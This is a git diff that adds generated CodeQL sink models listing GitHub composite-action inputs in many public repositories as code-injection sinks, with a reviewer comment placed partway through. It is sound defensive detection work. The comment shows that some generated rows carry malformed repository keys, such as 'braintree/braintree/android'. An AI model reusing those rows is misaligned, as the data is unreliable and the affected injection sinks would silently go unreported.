@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["braintree/braintree/android", "*", "inputs.version", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "inputs.module", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "inputs.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "inputs.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml new file mode 100644 index 00000000000..fb4608ec70b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["broadinstitute/gatk", "*", "inputs.identifier", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "inputs.repo-path", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "inputs.CROMWELL_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml new file mode 100644 index 00000000000..3a6a4575d30 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["canonical/multipass", "*", "inputs.release-tag-re", "code-injection", "generated"] + - ["canonical/multipass", "*", "inputs.release-branch-re", "code-injection", "generated"] \ No newline at end of file 
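Review bot: The four rows in `braintree_braintree_android.model.yml` are keyed `"braintree/braintree/android"`, which reads as owner/repo/path rather than the `braintree/braintree_android` repository the file name suggests; the generator seems to have turned every `_` into `/`. If the first column is matched against the `uses:` reference (the matching code is not visible here), these code-injection sinks would presumably never match, and workflows passing untrusted data into those inputs would go unreported. The same pattern appears in `cloudfoundry_cloud_controller_ng.model.yml`, keyed `"cloudfoundry/cloud_controller/ng"`. Because the files are generated, the fix belongs in the generator, which should split owner from repo only at the first separator, giving rows like `["braintree/braintree_android", "*", "inputs.version", "code-injection", "generated"]`.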
diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml new file mode 100644 index 00000000000..d21c609e5ed --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chia-network/actions", "*", "inputs.keypair_path", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.role_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.backend_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.vault_url", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.ttl", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.vault_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml new file mode 100644 index 00000000000..76c92f51d26 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chia-network/chia-blockchain", "*", "inputs.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml new file mode 100644 index 00000000000..dc48b2e8d20 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chipsalliance/chisel", "*", "inputs.version", "code-injection", "generated"] + - ["chipsalliance/chisel", "*", "inputs.file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml new file mode 100644 index 00000000000..b46b5592ac5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chocobozzz/peertube", "*", "inputs.deployKey", "code-injection", "generated"] + - ["chocobozzz/peertube", "*", "inputs.knownHosts", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml new file mode 100644 index 00000000000..a38482ba696 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cilium/cilium-cli", "*", "inputs.binary-name", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.binary-dir", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.ci-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.release-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.repository", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.go-mod-directory", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.local-path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml new file mode 100644 index 00000000000..ca1bf2f894f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cilium/cilium", "*", "inputs.job-name", "code-injection", "generated"] + - ["cilium/cilium", "*", "inputs.lb-acceleration", "code-injection", "generated"] + - ["cilium/cilium", "*", "inputs.mutual-auth", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml new file mode 100644 index 00000000000..4a46ca788e5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["citusdata/citus", "*", "inputs.flags", "code-injection", "generated"] + - ["citusdata/citus", "*", "inputs.pg_major", "code-injection", "generated"] + - ["citusdata/citus", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml new file mode 100644 index 00000000000..b1c5270165b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["clerk/javascript", "*", "inputs.auth-email", "code-injection", "generated"] + - ["clerk/javascript", "*", "inputs.auth-password", "code-injection", "generated"] + - ["clerk/javascript", "*", "inputs.auth-user", "code-injection", "generated"] + - ["clerk/javascript", "*", "inputs.registry", "code-injection", "generated"] + - ["clerk/javascript", "*", "inputs.publish-cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml new file mode 100644 index 00000000000..9fcaa3fff76 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloud-custodian/cloud-custodian", "*", "inputs.poetry-version", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "inputs.bucket-url", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "inputs.docs-dir", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml new file mode 100644 index 00000000000..f21c3c1f9de --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudflare/workers-sdk", "*", "inputs.package-manager", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml new file mode 100644 index 00000000000..7ff68860cf8 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudfoundry/cloud_controller/ng", "*", "inputs.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml new file mode 100644 index 00000000000..9e3d5bd41e3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["coder/coder", "*", "inputs.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml new file mode 100644 index 00000000000..63373bd78a7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["coil-kt/coil", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml new file mode 100644 index 00000000000..529614b8d79 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["commaai/openpilot", "*", "inputs.sleep_time", "code-injection", "generated"] + - ["commaai/openpilot", "*", "inputs.docker_hub_pat", "code-injection", "generated"] + - ["commaai/openpilot", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml new file mode 100644 index 00000000000..ce3ce91d773 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["conan-io/conan-center-index", "*", "inputs.files", "code-injection", "generated"] + - ["conan-io/conan-center-index", "*", "inputs.reviewers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml new file mode 100644 index 00000000000..ececaa835e9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["corretto/corretto-8", "*", "inputs.version-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "inputs.upstream", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "inputs.merge-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "inputs.local-branch", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml new file mode 100644 index 00000000000..0c19019e4f3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cosmos/cosmos-sdk", "*", "inputs.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml new file mode 100644 index 00000000000..67a21fc2e86 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["coturn/coturn", "*", "inputs.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml new file mode 100644 index 00000000000..3f0c5e645de --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["crunchydata/postgres-operator", "*", "inputs.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml new file mode 100644 index 00000000000..470109b5e85 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml 
@@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cvc5/cvc5", "*", "inputs.build-dir", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.macos-target", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.check-examples", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.check-python-bindings", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.check-install", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.regressions-exclude", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.strip-bin", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.configure-config", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.configure-env", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml new file mode 100644 index 00000000000..5ffefd58e53 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["d2l-ai/d2l-en", "*", "inputs.command", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "inputs.work-dir", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "inputs.job-name", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "inputs.job-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml new file mode 100644 index 00000000000..742e1876811 --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.clean-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.deploy-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.wait-between-retries", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.retries-on-failure", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.check-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.build-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.pre-build-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml new file mode 100644 index 00000000000..97c75ae6f5c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-dotnet", "*", "inputs.command", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "inputs.baseImage", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "inputs.aas_github_token", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "inputs.artifacts_path", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "inputs.github_token", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml new file mode 100644 index 00000000000..fa98e84315d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-go", "*", "inputs.files", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "inputs.tags", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "inputs.service", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "inputs.dd-api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml new file mode 100644 index 00000000000..3bc48b644d0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-js", "*", "inputs.container-id", "code-injection", "generated"] + - ["datadog/dd-trace-js", "*", "inputs.init-image-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml new file mode 100644 index 00000000000..81e07943026 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datafuselabs/databend", "*", "inputs.dataset", "code-injection", "generated"] + - ["datafuselabs/databend", "*", "inputs.dirs", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml new file mode 100644 index 00000000000..a1fdb476748 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["davatorium/rofi", "*", "inputs.logfile", "code-injection", "generated"] + - ["davatorium/rofi", "*", "inputs.windowmode", "code-injection", "generated"] + - ["davatorium/rofi", "*", "inputs.cc", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml new file mode 100644 index 00000000000..5744f3e7495 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["debezium/debezium", "*", "inputs.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml new file mode 100644 index 00000000000..852e39799d9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["defenseunicorns/zarf", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml new file mode 100644 index 00000000000..a0d7eb51354 --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "inputs.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml new file mode 100644 index 00000000000..8d10d22cd5c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["department-of-veterans-affairs/vets-website", "*", "inputs.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml new file mode 100644 index 00000000000..c99c630853e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["devexpress/devextreme", "*", "inputs.name", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "inputs.result", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml new file mode 100644 index 00000000000..8554ebec65f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["diggerhq/digger", "*", "inputs.checkov-version", "code-injection", "generated"] + - ["diggerhq/digger", "*", "inputs.google-auth-credentials", "code-injection", "generated"] + - ["diggerhq/digger", "*", "inputs.google-workload-identity-provider", "code-injection", "generated"] + - ["diggerhq/digger", "*", "inputs.google-service-account", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml new file mode 100644 index 00000000000..6f0878a77cb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["diku-dk/futhark", "*", "inputs.script", "code-injection", "generated"] + - ["diku-dk/futhark", "*", "inputs.slurm-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml new file mode 100644 index 00000000000..198109f790c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["discourse/.github", "*", "inputs.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml new file mode 100644 index 00000000000..e634eaa38a2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dnsjava/dnsjava", "*", "inputs.name", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "inputs.filename", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml new file mode 100644 index 00000000000..e26ba9755d0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dotintent/react-native-ble-plx", "*", "inputs.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml new file mode 100644 index 00000000000..2cda1936f01 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dotnet/docs-tools", "*", "inputs.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml new file mode 100644 index 00000000000..f83cf533944 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dotnet/dotnet-monitor", "*", "inputs.files_to_commit", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml new file mode 100644 index 00000000000..5af04ac6ac7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dragonflydb/dragonfly", "*", "inputs.gspace-secret", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "inputs.filter", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "inputs.dfly-executable", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "inputs.build-folder-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml new file mode 100644 index 00000000000..0d0cae87e09 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eksctl-io/eksctl", "*", "inputs.token", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "inputs.email", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml new file mode 100644 index 00000000000..070b502e188 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["elastic/apm-agent-dotnet", "*", "inputs.project", "code-injection", "generated"] + - ["elastic/apm-agent-dotnet", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml new file mode 100644 index 00000000000..6c0cf90523a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["elastic/apm-agent-java", "*", "inputs.tag", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "inputs.path", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "inputs.name", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "inputs.test-java-version", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml 